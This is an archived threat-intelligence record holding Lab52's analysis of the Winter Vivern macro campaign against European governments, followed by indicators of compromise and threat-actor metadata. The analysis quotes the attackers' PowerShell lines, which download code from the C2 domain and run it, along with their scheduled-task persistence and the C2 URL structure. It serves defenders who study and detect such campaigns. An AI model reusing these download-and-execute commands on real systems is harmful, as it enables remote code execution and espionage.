{
	"id": "ac94bb62-fe26-44e5-b1c0-d0efd24bb04a",
	"created_at": "2026-04-06T00:21:42.545643Z",
	"updated_at": "2026-04-10T03:30:21.385984Z",
	"deleted_at": null,
	"sha1_hash": "0a9527646ec6c64b50b78e006ff9aef70bda6aad",
	"title": "Winter Vivern – all Summer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 640355,
	"plain_text": "Winter Vivern – all Summer\r\nPublished: 2021-09-28 · Archived: 2026-04-05 18:57:56 UTC\r\nIn July, 2021, Lab52 found a currently active infection campaign (domain still up at the time of this writing) attributed to a\r\ngroup referred as Wintervivern after a report published by the research team from DomainTools.\r\nAs the starting point for this research, we recently noticed that unless properly obfuscated, some functions in XLM macro\r\ncould show their arguments in the strings of the excel file containing the macros.\r\nWe decided to take some advantage from this fact, and we tried to hunt for interesting excel files until we found a set of\r\nexcel documents that revealed an active campaign against European governments, and without attribution so far.\r\nWe first caught a generic powershell line in a XLM macro, which caught our attention along with other keywords:\r\npowershell.exe -c iex((new-object net.webclient).DownloadString(‘https://server/run.txt’))\r\nAdditionally, the yara ruleset created by John Lambert (@JohnLaTwC) indicated that the XML macro contained in this\r\ndocument was potentially created using SharpShooter (gen_Excel4Macro_Sharpshooter) which could be a useful fact in\r\norder to track the activity of the actors behind these documents.\r\nAs stated before, we also found in this same document other very interesting strings that would give an idea about the\r\ndocument’s content, along with some email addresses. Some of this strings were the following:\r\nExternal Relations Committee\r\nWorking Party on Short-Term Economic Prospects\r\nGoverning Board of the Development Centre\r\nGlobal Forum on Public Governance\r\nFurthermore, this document contained embedded the following URL, many times:\r\nhxxps://securetourspd.]com/syncService/sync.php?\r\nv=3ac2cc6263f84836a7cb38d04f1094b6907527c3e0265dd0dc480b0ba1204e51\r\nAfter a quick behavioral analysis of the document, we found out that the aforementioned command would serve the\r\nfollowing new commands using a user-agent filter only serving requests coming from the MS Excel user-agent.\r\nhttps://lab52.io/blog/winter-vivern-all-summer/\r\nPage 1 of 5\n\nThis new set of commands would first download from the same domain a XML file and use it to establish a scheduled task\r\nfor persistence, with name “Server_Update_Synchronization-{SDFGEYH-9D36-4HB1-8BWD-0EC1BD4FNM131}”,\r\nwhich would execute the following commands after Logon:\r\npowershell.exe -w hidden -c “start-process ‘powershell.exe’ -win hidden -argumentlist {\r\n$g=New-Object Net.Webclient;\r\n$g.credentials=[net.credentialcache]::DefaultNetworkCredentials;\r\niex\r\ng.DownloadString(‘https://securetourspd.com/../users/2cd6c84c6c64ec05e7b418e15f9d1b7c0dc6733154aa266c64f0cb74e2083472/ceec36e6c881b957\r\nAfter establishing the persistence, it implements a function which happens to be a minimal RAT which is called every 10\r\nseconds and receives a command from C2, executes it, and sends the result back to the C2.\r\nThe contacted domain was registered on July 1st pointing to 185.238.]169.57 associated to the ISP “IROKO Networks\r\nCorporation/Scalaxy B.V. Researching about this domain, we found that VirusTotal showed some interesting full URLs,\r\nbeing one of them, the one we already found in the starting document.\r\nIt was also interesting the fact that the URL containing “mzv.sk/downloadFile” was actually indexed in Google:\r\nWe could also reach some of those downloaded XLS files from the domain, and observed that these documents did not\r\ncontain any functionality or suspicious strings.\r\nhttps://lab52.io/blog/winter-vivern-all-summer/\r\nPage 2 of 5\n\nHowever, after reviewing these documents and the URLs, we noticed that the documents and the domains contained as part\r\nof the path in the URL were directly related to different government institutions from different countries:\r\nsds.va –\u003e Segreteria di Stato – Vaticano – Secretariat of State\r\nlrp.lt –\u003e Lietuvos Respublikos Prezidentas – Lithuania – President of the Republic of Lithuania\r\nmzv.sk –\u003e Ministerstvo zahraničných vecí – Slovakia – Ministry of Foreign Affairs\r\nAt this point, now we could identify an interesting pattern in the different URLs found that allowed us to divide the C2\r\ncontacts in three different URLs for different functionalities.\r\n1. https:// [C2 domain]/[target domain]/excel_files_service/downloadFile.php?v=[some victim ID]\r\n2. https:// [C2 domain]/syncService/sync.php?v=[some victim ID]\r\n3. https:// [C2 domain]/../users/[some victim ID]/[some file ID].php’\r\n4. https:// [C2 domain]/xml_file.xml\r\nURL #1 would just download the XLS file with no macros, which could indicate that this could be used to serve clean files\r\nas a decoy.\r\nURL #2 would be found in XLS files with XLM macros and it could be the first contact with the C2 after the infection. This\r\nwould trigger the next stages of the infection since it would download and execute the previously documented commands\r\nand install the persistence as a scheduled task.\r\nURL #3 would be found within the scheduled task and it would also download the same commands than URL #2 but\r\nwithout the lines to establish the scheduled task. Also, and most importantly, this URL structure would also be used for the\r\nC2 communication for command execution using a different [file ID] for command requests or sending command results.\r\nURL #4 would download the xml file used for the scheduled task.\r\nWe tried to pull the thread of this URL structures but after some unsuccessful research we had to go back to the execution\r\ndetails, and we finally ended up finding something while searching by the name of the scheduled task.\r\nWith the help of Google dorking, we found a new XLS document with excel4 macros uploaded to the public sandbox of\r\nany.run:\r\nΕνημερωμένος κατάλογος_NS.xls fdc4631008461df18e78fb653662f111\r\nOn the other hand, using the same information we also found in VTi two .txt files named serverHttpRequest(RUN).txt which\r\nwould be downloaded by different samples:\r\n6661ea544a541357ada6c32eb70cd96c\r\n7a59366676daaa95cc71a0110ef75753\r\nThe two .txt files resulted to be the same powershell content executed by the first download of the malicious XLS file with\r\nslight differences, and the xls file from any.run also resulted to follow the same techniques. In fact, it seems like the excel\r\nfile would download one of those two files since it would contact the following URL, whose domain was also found in the\r\n.txt files:\r\nhxxps://secure-daddy.]com/wintervivern/server/serverHttpRequest(RUN).txt’\r\nAt this point, we could relate this new campaign with another recent campaign from a May 2021 named “Winter Vivern”\r\ndue to the path from URL and described by the research team of DomainTools.\r\nOne important thing to note, as DomainTools also stated, is the fact that all the information contained in the different XLS\r\ndocument seems to be public, which means that this documents were carefully crafted to target very specific entities.\r\nhttps://lab52.io/blog/winter-vivern-all-summer/\r\nPage 3 of 5\n\nThanks to this new discovery, we obtained a new set of similar malicious XLS with the same excel4 macros, using different\r\ndomains, which increased the list of targeted countries while still aiming to government institutions.\r\nIf we compare the full URLs used in both campaigns we could relate them as equivalent, resulting in:\r\n1. No equivalent URL\r\n2. https:// [C2 domain]/wintervivern/server/serverHttpRequest(RUN).txt’\r\n3. a. https:// [C2 domain /wintervivern/vivern/getAnswer.php?username=$uname’\r\nb. https:// [C2 domain] /wintervivern/vivern/getcommand?username=$uname\r\n4. a. https:// [C2 domain]/vivern/test_old.xml\r\nb. https:// [C2 domain]/vivern/test.xml\r\nThe slight differences found in the analogy of URLs is actually revealing very interesting information about the evolution of\r\nthis threat actor.\r\nFirst, we did not find a path serving clean files that we assumed they could be used as a decoy. Secondly, we find a single\r\ncommon URL for all XLS files, instead of containing victim identifiers. Due to the lack of victim identifiers, we would find\r\nmore generic URLs for the reception of commands and delivery of results, where only the username of the infected\r\ncomputer would be reported to the C2. Lastly, we find two different versions of the xml document served for the scheduled\r\ntask, both containing “test” as a name. This could be intentional so as not to raise alarms on the victim, but it is clear that\r\nthere has been a small evolution in some details of the TTPs of this actor, which is currently active.\r\nIndicators of Compromise:\r\n37.252.]9.123\r\n37.252.5.]133\r\n185.238.]169.57\r\nsecuretourspd[.]com\r\nsecure-daddy[.]com\r\ncentr-security[.]com\r\nsecuremanag[.]com\r\nmloncar@seidco.]net\r\n94f45ba55420961451afd1b70657375ec64b7697a515a37842478a5009694cfa\r\n2a176721b35543d7f4d9e3d24a7c50e0ea57d7eaa251c6b24985d5266a6a977a\r\nf84044bddbd3e05fac1319c988919492971553bb65dbf7b7988d66a8cd677eb8\r\nbd1efa4cf3f02cd8723c48deb5f69a432c22f359b93cab4f1d2a9f037a236eaa\r\n00f6291012646213a5aab81153490bb121bbf9c64bb62eb4ce582c3af88bccfd\r\n638bedcc00c1b1b8a25026b34c29cecc76c050aef56fa55f6e8878e6b951e473\r\nc34e98a31246f0903d4742dcf0a9890d5328ba8a1897fcf9cd803e104591ed5f\r\n4f498238ba3568fd9dc2d12954e16bdd06ddadd4484fa2b40c6f9cf08a2c1360\r\nd66b7443285a23cea3c21cdfeb7fbc22cac53f347437ff26b9d709279996744a\r\n0303936e7341b47b797b42b6911101d72a82f38faa263898c5993e7ee90107cc\r\n2a176721b35543d7f4d9e3d24a7c50e0ea57d7eaa251c6b24985d5266a6a977a\r\n066ac6b068ba1b3f177173a113085cc53c785e875b841948df8bbf095c61807d\r\n63005efc652557fad43118273e11f7b37e2d59db2d677e936cddab82fba30602\r\n2f52434696f98c9668a85f1af5dd4af2be729a7971f878ca9125731e27c63c50\r\nb5551ee3d24c53983670fca24e07f0b86ceb3adb7ac353d59fc98f481e5339ca\r\ncdca87c79b4c3c0ed4ffad2a7a64f267250d94ed9e9f8d931faad91cecb5a595\r\n0682e44d2e37f2f7b3f42fffa8366f4b20470ab54ece04da444f47efda1ac610\r\nhttps://lab52.io/blog/winter-vivern-all-summer/\r\nPage 4 of 5\n\nSource: https://lab52.io/blog/winter-vivern-all-summer/\r\nhttps://lab52.io/blog/winter-vivern-all-summer/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://lab52.io/blog/winter-vivern-all-summer/"
	],
	"report_names": [
		"winter-vivern-all-summer"
	],
	"threat_actors": [
		{
			"id": "23226bab-4c84-4c65-a8d1-7ac10c44b172",
			"created_at": "2023-04-27T02:04:45.463683Z",
			"updated_at": "2026-04-10T02:00:04.980143Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA473",
				"TAG-70",
				"UAC-0114",
				"UNC4907"
			],
			"source_name": "ETDA:Winter Vivern",
			"tools": [
				"APERETIF"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e6704f3c-15d7-4e1d-b5a8-e33e7e9bd925",
			"created_at": "2023-11-04T02:00:07.660461Z",
			"updated_at": "2026-04-10T02:00:03.385093Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"TA-473",
				"UAC-0114",
				"TA473",
				"TAG-70"
			],
			"source_name": "MISPGALAXY:Winter Vivern",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a13b5ca4-fb52-44a9-aa5a-595eca6789ed",
			"created_at": "2022-10-25T15:50:23.4331Z",
			"updated_at": "2026-04-10T02:00:05.381716Z",
			"deleted_at": null,
			"main_name": "Sharpshooter",
			"aliases": [
				"Sharpshooter"
			],
			"source_name": "MITRE:Sharpshooter",
			"tools": [
				"Rising Sun"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a20598c1-894c-4173-be6e-64a1ce9732bd",
			"created_at": "2024-11-01T02:00:52.652891Z",
			"updated_at": "2026-04-10T02:00:05.375678Z",
			"deleted_at": null,
			"main_name": "Winter Vivern",
			"aliases": [
				"Winter Vivern",
				"TA473",
				"UAC-0114"
			],
			"source_name": "MITRE:Winter Vivern",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434902,
	"ts_updated_at": 1775791821,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0a9527646ec6c64b50b78e006ff9aef70bda6aad.pdf",
		"text": "https://archive.orkl.eu/0a9527646ec6c64b50b78e006ff9aef70bda6aad.txt",
		"img": "https://archive.orkl.eu/0a9527646ec6c64b50b78e006ff9aef70bda6aad.jpg"
	}
}